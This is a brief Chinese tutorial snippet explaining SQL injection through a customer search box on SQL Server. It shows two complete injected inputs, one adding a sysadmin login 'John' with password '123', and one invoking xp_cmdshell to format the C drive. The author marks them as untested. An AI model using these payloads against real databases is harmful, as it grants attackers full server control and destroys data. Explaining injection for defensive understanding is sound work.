SQL注入式攻击

如果用户在文本框中输入：

a' EXEC sp_addlogin 'John' ,'123' EXEC sp_addsrvrolemember 'John','sysadmin' --

那么SqlStr的内容就是：

select * from customers where CompanyName like '%a' EXEC sp_addlogin 'John','123' EXEC sp_addsrvrolemember 'John','sysadmin' --

这个语句是在后台数据库中增加一个用户John，密码123，而且是一个sysadmin账号，相当于sa的权限。

如果用户在文本框中输入：

a' EXEC xp_cmdShell('format c:/y') --

运行之后好像是格式化C盘！

以上代码未经测试